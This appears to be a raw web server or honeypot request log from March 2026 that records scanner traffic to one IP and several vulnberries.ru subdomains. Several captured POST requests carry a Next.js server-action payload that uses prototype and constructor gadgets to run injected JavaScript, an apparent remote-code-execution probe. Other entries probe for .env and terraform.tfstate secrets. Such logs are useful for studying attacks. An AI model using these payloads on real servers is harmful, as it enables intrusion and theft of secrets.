Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.12:33036
Path: /
URL: /
Method: GET
[2026-03-08 21:27:19] === HTTP Request ===
[2026-03-08 21:27:19] Main page accessed - IP: 85.142.100.12:33827
===================
User-Agent: User-Agent ("Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)")
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 85.142.100.12:33827
Path: /
URL: /
Method: GET
[2026-03-08 21:27:19] === HTTP Request ===
[2026-03-08 19:56:01] Main page accessed - IP: 205.210.31.83:54708
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.83:54708
Path: /
URL: /
Method: GET
[2026-03-08 19:56:01] === HTTP Request ===
[2026-03-08 19:12:59] Main page accessed - IP: 207.90.244.26:38942
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:38942
Path: /
URL: /
Method: GET
[2026-03-08 19:12:59] === HTTP Request ===
[2026-03-08 19:12:33] Main page accessed - IP: 18.97.5.59:37344
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3059.63 Safari/537.32
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 18.97.5.59:37344
Path: /
URL: /
Method: GET
[2026-03-08 19:12:33] === HTTP Request ===
[2026-03-08 19:12:17] Main page accessed - IP: 207.90.244.20:42570
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:42570
Path: /
URL: /
Method: GET
[2026-03-08 19:12:17] === HTTP Request ===
[2026-03-08 18:49:54] Main page accessed - IP: 185.247.137.199:44561
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: ch.bakunin.me:8081
RemoteAddr: 185.247.137.199:44561
Path: /
URL: /
Method: GET
[2026-03-08 18:49:54] === HTTP Request ===
===================
------WebKitFormBoundaryx55246138879--
------WebKitFormBoundaryx55246138879
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx55246138879
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 125094+true+441637;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx55246138879
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 513
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx55246138879
X-Nextjs-Html-Request-Id: ilovepoop_55246138879
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54120
Path: /api/route
URL: /api/route
Method: POST
[2026-03-08 16:51:32] === HTTP Request ===
===================
------WebKitFormBoundaryx507507934199--
------WebKitFormBoundaryx507507934199
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx507507934199
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 134902+true+3762049;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx507507934199
X-Nextjs-Html-Request-Id: ilovepoop_507507934199
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx507507934199
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54116
Path: /app
URL: /app
Method: POST
[2026-03-08 16:51:30] === HTTP Request ===
===================
------WebKitFormBoundaryx242665369033--
------WebKitFormBoundaryx242665369033
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx242665369033
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 46524+true+5215918;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx242665369033
X-Nextjs-Html-Request-Id: ilovepoop_242665369033
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx242665369033
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54108
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-08 16:51:25] === HTTP Request ===
===================
------WebKitFormBoundaryx233063377071--
------WebKitFormBoundaryx233063377071
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx233063377071
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 29570+true+7881751;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx233063377071
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx233063377071
Next-Action: x
X-Nextjs-Html-Request-Id: ilovepoop_233063377071
X-Nextjs-Request-Id: poop1234
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54278
Path: /api
URL: /api
Method: POST
[2026-03-08 16:51:23] === HTTP Request ===
===================
------WebKitFormBoundaryx253734509601--
------WebKitFormBoundaryx253734509601
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx253734509601
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 335800+true+755612;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx253734509601
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx253734509601
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_253734509601
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54262
Path: /_next
URL: /_next
Method: POST
[2026-03-08 16:51:22] === HTTP Request ===
[2026-03-08 16:51:20] Main page accessed - IP: 195.3.221.86:54260
===================
------WebKitFormBoundaryx1090844962579--
------WebKitFormBoundaryx1090844962579
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1090844962579
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 150114+true+7266777;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1090844962579
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1090844962579
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
X-Nextjs-Html-Request-Id: ilovepoop_1090844962579
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54260
Path: /
URL: /
Method: POST
[2026-03-08 16:51:20] === HTTP Request ===
[2026-03-08 16:51:19] Main page accessed - IP: 195.3.221.86:54250
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:54250
Path: /
URL: /
Method: GET
[2026-03-08 16:51:19] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.122:2324
Path: /security.txt
URL: /security.txt
Method: GET
[2026-03-08 16:51:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.122:14584
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-08 16:51:14] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.122:14574
Path: *
URL: *
Method: PRI
[2026-03-08 16:51:13] === HTTP Request ===
[2026-03-08 16:51:13] Main page accessed - IP: 66.132.153.122:14558
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.122:14558
Path: /
URL: /
Method: GET
[2026-03-08 16:51:13] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.14:34472
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-08 16:38:11] === HTTP Request ===
[2026-03-08 16:38:11] Main page accessed - IP: 85.217.140.14:34466
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.14:34466
Path: /
URL: /
Method: GET
[2026-03-08 16:38:11] === HTTP Request ===
[2026-03-08 16:14:43] Main page accessed - IP: 87.236.176.220:37589
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru:8081
RemoteAddr: 87.236.176.220:37589
Path: /
URL: /
Method: GET
[2026-03-08 16:14:43] === HTTP Request ===
[2026-03-08 15:17:58] Main page accessed - IP: 172.30.0.12:59868
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 205.210.31.153
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59868
Path: /
URL: /
Method: GET
[2026-03-08 15:17:58] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 205.210.31.72:59398
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 14:32:26] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.148.2:31724
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-08 13:06:53] === HTTP Request ===
[2026-03-08 12:53:06] Main page accessed - IP: 87.236.176.149:44415
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: anki.ch.bakunin.me:8081
RemoteAddr: 87.236.176.149:44415
Path: /
URL: /
Method: GET
[2026-03-08 12:53:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:49748
Path: /jars
URL: /jars
Method: GET
[2026-03-08 12:46:42] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 198.235.24.115:60568
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 12:36:28] === HTTP Request ===
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.108
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42416
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 12:19:05] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 198.235.24.120:61144
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 12:09:00] === HTTP Request ===
===================
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept-Language: en-US,en;q=0.5
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 146.190.33.240:45222
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-08 11:58:33] === HTTP Request ===
[2026-03-08 11:58:32] Main page accessed - IP: 146.190.33.240:34784
===================
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 146.190.33.240:34784
Path: /
URL: /
Method: GET
[2026-03-08 11:58:32] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.219:61692
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 11:44:54] === HTTP Request ===
[2026-03-08 10:50:59] Main page accessed - IP: 87.236.176.167:41911
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru:8081
RemoteAddr: 87.236.176.167:41911
Path: /
URL: /
Method: GET
[2026-03-08 10:50:59] === HTTP Request ===
[2026-03-08 10:27:02] Main page accessed - IP: 176.65.149.45:53836
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:53836
Path: /
URL: /
Method: GET
[2026-03-08 10:27:02] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 147.185.132.225:63878
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 10:24:24] === HTTP Request ===
===================
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Priority: u=0, i
Referer: http://95.143.191.38:8081/
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.227.206.165:50002
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-08 10:04:32] === HTTP Request ===
[2026-03-08 10:04:31] Main page accessed - IP: 165.227.206.165:49994
===================
Priority: u=0, i
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.227.206.165:49994
Path: /
URL: /
Method: GET
[2026-03-08 10:04:31] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 147.185.132.37:62526
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 09:57:21] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 198.235.24.74:61406
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 09:44:38] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50026
Path: /terraform.tfstate
URL: /terraform.tfstate
Method: GET
[2026-03-08 09:18:19] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 198.235.24.78:63730
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 08:51:26] === HTTP Request ===
[2026-03-08 08:41:28] Main page accessed - IP: 34.79.181.63:49130
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.181.63:49130
Path: /
URL: /
Method: GET
[2026-03-08 08:41:28] === HTTP Request ===
[2026-03-08 06:34:47] Main page accessed - IP: 185.247.137.142:52743
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru:8081
RemoteAddr: 185.247.137.142:52743
Path: /
URL: /
Method: GET
[2026-03-08 06:34:47] === HTTP Request ===
[2026-03-08 05:41:30] Main page accessed - IP: 20.163.60.90:58252
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.163.60.90:58252
Path: /
URL: /
Method: GET
[2026-03-08 05:41:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:44728
Path: /jars
URL: /jars
Method: GET
[2026-03-08 05:28:17] === HTTP Request ===
[2026-03-08 05:17:57] Main page accessed - IP: 207.90.244.26:45094
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:45094
Path: /
URL: /
Method: GET
[2026-03-08 05:17:57] === HTTP Request ===
[2026-03-08 04:54:05] Main page accessed - IP: 176.65.149.45:50812
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50812
Path: /
URL: /
Method: GET
[2026-03-08 04:54:05] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 205.210.31.99:64134
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 03:46:14] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 176.65.149.215:38062
Path:
URL: //google.com:443
Method: CONNECT
[2026-03-08 02:54:05] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.81:60420
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 02:50:37] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 147.185.132.105:61446
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-08 01:00:29] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.134.3:29376
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-08 00:48:08] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53626
Path: /.env
URL: /.env
Method: GET
[2026-03-08 00:21:48] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 212.192.158.68:39670
Path: /index.asp
URL: /index.asp
Method: GET
[2026-03-07 23:51:33] === HTTP Request ===
[2026-03-07 21:13:40] Main page accessed - IP: 198.235.24.47:59062
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.47:59062
Path: /
URL: /
Method: GET
[2026-03-07 21:13:40] === HTTP Request ===
[2026-03-07 19:57:51] Main page accessed - IP: 198.235.24.116:51362
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.116:51362
Path: /
URL: /
Method: GET
[2026-03-07 19:57:51] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50000
Path: /.env
URL: /.env
Method: GET
[2026-03-07 18:24:44] === HTTP Request ===
===================
------WebKitFormBoundaryx1249357074951--
------WebKitFormBoundaryx1249357074951
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1249357074951
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 288199+true+4335050;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1249357074951
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1249357074951
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1249357074951
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41932
Path: /api/route
URL: /api/route
Method: POST
[2026-03-07 18:15:58] === HTTP Request ===
===================
------WebKitFormBoundaryx95322914337--
------WebKitFormBoundaryx95322914337
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx95322914337
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 18917+true+5039008;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx95322914337
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_95322914337
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx95322914337
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41914
Path: /app
URL: /app
Method: POST
[2026-03-07 18:15:58] === HTTP Request ===
===================
------WebKitFormBoundaryx103254514353--
------WebKitFormBoundaryx103254514353
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx103254514353
